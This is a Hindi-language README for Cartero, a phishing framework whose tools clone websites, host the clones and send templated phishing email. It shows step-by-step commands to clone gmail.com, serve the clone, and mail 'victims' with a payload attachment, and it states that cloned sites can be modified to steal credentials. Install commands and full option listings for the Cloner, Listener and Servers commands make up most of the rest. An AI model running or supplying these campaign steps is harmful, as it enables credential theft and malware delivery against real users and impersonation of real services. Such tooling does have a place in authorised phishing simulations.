
मॉड्यूलर फ़िशिंग फ्रेमवर्क जिसमें साइट्स क्लोन करने, टेम्पलेटेड ईमेल भेजने, तथा ईमेल, SMS, iMessage और LinkedIn के माध्यम से फ़िशिंग अभियान चलाने के लिए CLI शामिल है।
http://section9labs.github.io/Cartero/
एक मजबूत फ़िशिंग फ्रेमवर्क जिसमें पूर्ण विशेषताओं वाला CLI इंटरफ़ेस है। यह परियोजना वर्षों के अभियानों के दौरान ऐसे उपकरणों के साथ आवश्यकता से जन्मी थी जो काम ठीक से नहीं करते थे। भले ही बाज़ार में कई परियोजनाएँ हैं, हमें ऐसा उपयुक्त समाधान नहीं मिला जो हमें आसान उपयोग और अनुकूलन क्षमता दोनों प्रदान करे।
Cartero एक मॉड्यूलर परियोजना है जो स्वतंत्र कार्य करने वाले कमांडों में विभाजित है (जैसे Mailer, Cloner, Listener, AdminConsole, आदि)। इसके अलावा प्रत्येक उप-कमांड में दोहराए जाने योग्य कॉन्फ़िगरेशन विकल्प होते हैं जो आपके काम को कॉन्फ़िगर और स्वचालित करते हैं।
उदाहरण के लिए, यदि हम gmail.com को क्लोन करना चाहते हैं, तो हमें केवल निम्नलिखित कमांड निष्पादित करने होंगे।```shell ❯❯❯ ./cartero Cloner --url https://gmail.com --path /tmp --webserver gmail_com ❯❯❯ ./cartero Listener --webserver /tmp/gmail_com -p 80 Launching mongodb Puma starting in single mode...
एक बार साइट चालू हो जाने पर, हम अपने पीड़ितों को टेम्पलेट वाले ईमेल भेजने के लिए आसानी से Mailer कमांड का उपयोग कर सकते हैं:```shell
❯❯❯ ./cartero Mailer --data victims.json --server gmail_com --subject "Internal Memo" --htmlbody email_html.html --attachment payload.pdf --from "John Doe <[email protected]>"
Sending [email protected]
Sending [email protected]
Sending [email protected]
हमारे Slack समुदाय से जुड़ें: https://carteroslack.herokuapp.com/
brew 2.1.5 ruby को डिफ़ॉल्ट ruby लाइब्रेरी के रूप में उपयोग करते हुए```shell ❯❯❯ curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash
RVM 2.1.5 ruby इंस्टॉलेशन का उपयोग करना```shell
❯❯❯ curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash -s -- -r
❯❯❯ \curl -sSL https://get.rvm.io | bash -s stable --ruby
##### MongoDB
Cartero, Listener और Admin पक्ष पर डेटा संग्रहीत करने के लिए MongoDB + MongoID लाइब्रेरी का उपयोग करता है।
OSX पर:```shell
❯❯❯ brew install mongodb
Ubuntu / Kali / Debian पर```shell ❯❯❯ apt-get install mongodb
Arch Linux पर```
❯❯❯ pacman -Syu mongodb
❯❯❯ git clone https://github.com/section9labs/Cartero ❯❯❯ cd Cartero ❯❯❯ gem install bundle ❯❯❯ bundle install ❯❯❯ cd bin
### उपयोग
### कमांड्स
कार्टेरो एक बहुत शक्तिशाली और उपयोग में आसान CLI है।```shell
❯❯❯ ./cartero
Usage: cartero [options]
List of Commands:
AdminConsole, AdminWeb, Mailer, Cloner, Listener, Servers, Templates
Global options:
--proxy [HOST:PORT] Sets TCPSocket Proxy server
-c, --config [CONFIG_FILE] Provide a different cartero config file
-v, --[no-]verbose Run verbosely
-p [PORT_1,PORT_2,..,PORT_N], Global Flag fo Mailer and Webserver ports
--ports
-m, --mongodb [HOST:PORT] Global Flag fo Mailer and Webserver ports
-d, --debug Sets debug flag on/off
--editor [EDITOR] Edit Server
Common options:
-h, --help [COMMAND] Show this message
--list-commands Prints list of commands for bash completion
--version Shows cartero CLI version
यह MongoDB के लिए एक सरल Wrapper है जो हमें सही ~/.cartero पथ पर संबंधित कमांड्स के साथ डेटाबेस को प्रारंभ और बंद करने की सुविधा देता है।```shell ❯❯❯ ./cartero Mongo Usage: Cartero Mongo [options] -s, --start Start MongoDB -k, --stop Stop MongoDB -r, --restart Restart MongoDB -b, --bind [HOST:PORT] Set MongoDB bind_ip and port
Common options: -h, --help Show this message --list-options Show list of available options
#### Cloner
एक WebSite Cloner जो हमें किसी वेबसाइट को डाउनलोड करके Cartero WebServer एप्लिकेशन में बदलने की सुविधा देता है।
हम वेबसाइट को जल्दी और आसानी से अनुकूलित कर सकते हैं ताकि Credentials चुराए जा सकें, Payloads सर्वर पर भेजे जा सकें, या साइट को किसी भी संख्या में उद्देश्यों के लिए पूरी तरह से संशोधित किया जा सके।```shell
❯❯❯ ./cartero Cloner
Usage: Cartero Cloner [options]
-U, --url [URL_PATH] Full Path of site to clone
-W, --webserver [SERVER_NAME] Sets WebServer name to use
-p, --path [PATH] Sets path to save webserver
-P, --payload [PAYLOAD_PATH] Sets payload path
--useragent [UA_STRING] Sets user agent for cloning
--wget Use wget to clone url
--apache Generate Apache Proxy conf
Common options:
-h, --help Show this message
--list-options Show list of available options
डिफ़ॉल्ट रूप से कमांड लिंक को डाउनलोड करने और रेंडर करने के लिए कन्वर्ट करने हेतु हमारे Ruby इम्प्लीमेंटेशन का उपयोग करता है, लेकिन हम एक --wget विकल्प का भी समर्थन करते हैं जो स्थानीय wget सिस्टम कमांड का उपयोग करेगा।
लिसनर Cloner के माध्यम से बनाए गए WebServer या मैन्युअल रूप से बनाई गई साइट को चलाने के लिए जिम्मेदार है। डिफ़ॉल्ट रूप से, यदि कोई साइट प्रदान नहीं की गई है, तो हम एक बहुत ही सरल वेबसाइट प्रस्तुत करते हैं।```shell ❯❯❯ ./cartero Listener Usage: Cartero Listener [options] -i, --ip [1.1.1.1] Sets IP interface, default is 0.0.0.0 -p [PORT_1,PORT_2,..,PORT_N], Sets Email Payload Ports to scan --ports -s, --ssl Run over SSL. [this also requires --sslcert and --sslkey] -C, --sslcert [CERT_PATH] Sets Email Payload Ports to scan -K, --sslkey [KEY_PATH] Sets SSL key to use for Listener. -V, --views [VIEWS_FOLDER] Sets SSL Certificate to use for Listener. -P, --public [PUBLIC_FOLDER] Sets a Sinatra public_folder -W [WEBSERVER_FOLDER], Sets the sinatra full path from cloner. --webserver --payload [PAYLOAD] Sets a payload download to serve on /download --customapp [CUSTOM_SINATRA] Sets a custom Sinatra::Base WebApp. Important, WebApp name should be camelized of filename
Common options: -h, --help Show this message --list-options Show list of available options
WebServers कई IP, Hostnames और Ports पर ssl keys और virtual hosts का समर्थन करते हैं।
#### सर्वर
ईमेल अभियान भेजने के लिए हमें ईमेल सर्वर सेटअप करने की आवश्यकता होती है और यह कमांड Cartero को सर्वर बनाने, संग्रहीत करने और सूचीबद्ध करने की अनुमति देता है। सभी डेटा ~/.cartero कॉन्फ़िगरेशन निर्देशिका में संग्रहीत किया जाता है।```shell
./cartero Servers
Usage: Cartero Servers [options]
-a, --add [NAME] Add Server
-e, --edit [NAME] Edit Server
-d, --delete [NAME] Edit Server
-l, --list List servers
Configuration options:
-T, --type [TYPE] Set the type
-U, --url [DOMAIN] Set the Mail or WebMail url/address
-M, --method [METHOD] Sets the WebMail Request Method to use [GET|POST]
--api-access [API_KEY] Sets the Linkedin API Access Key
--api-secret [API_SECRET] Sets the Linkedin API Secret Key
--oauth-token [OAUTH_TOKEN] Sets the Linkedin OAuth Token Key
--oauth-secret [OAUTH_SECRET]
Sets the Linkedin OAuth Secret Key